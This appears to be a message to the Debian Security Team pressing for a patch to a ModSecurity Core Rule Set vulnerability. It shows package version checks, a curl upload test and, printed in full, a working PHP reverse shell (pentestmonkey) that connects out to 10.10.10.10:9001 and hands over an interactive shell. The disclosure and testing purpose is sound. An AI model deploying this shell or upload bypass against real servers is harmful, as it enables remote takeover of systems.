i see root@4cbc316d5a12:/# dpkg -l | grep modsecurity-crs
apt-cache policy modsecurity-crs
ii modsecurity-crs 3.3.7-1+deb13u1
all OWASP ModSecurity Core Rule Set
modsecurity-crs:
Installed: 3.3.7-1+deb13u1
Candidate: 3.3.7-1+deb13u1
Version table:
*** 3.3.7-1+deb13u1 100
100 /var/lib/dpkg/status
root@4cbc316d5a12:/#
Still the old version in a the stable debian
and i tried as a test
relunsec@relunsec:~/CVE-2026-33691$ curl -i -X POST
"http://127.0.0.1:8082/upload"; -F "file=@test. php"
HTTP/1.1 404 Not Found
Date: Tue, 14 Apr 2026 08:23:17 GMT
Server: Apache/2.4.66 (Debian)
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd";>
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.66 (Debian) Server at 127.0.0.1 Port 8082</address>
</body></html>
relunsec@relunsec:~/CVE-2026-33691$ cat 'test. php'
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments
stripped to slim it down. RE:
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 [email protected]
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.10';
$port = 9001;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and
not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
i see nothing blocked
On Mon, Apr 13, 2026 at 4:43 AM cyber security <[email protected]> wrote:
>
> Hello, Debian Security Team
>
>
> that is 15 days, the cve still not patched,
> https://nvd.nist.gov/vuln/detail/CVE-2026-33691 it is already **High**
> Officialy by NIST, and a metasploit evaison module, will be soon
> published and i will open a pr linked to the issue
> **https://github.com/rapid7/metasploit-framework/issues/21228** and
> PRs is open **https://github.com/MarkLee131/awesome-web-pocs/pull/1**,
> you left users vulnerable to attacks. Only unstable users benefit from
> the patch, latest users remaining fully vulnerable, Users are waiting
> for patches from Debian, and it still not patched
>
> Best Regards,
> RelunSec
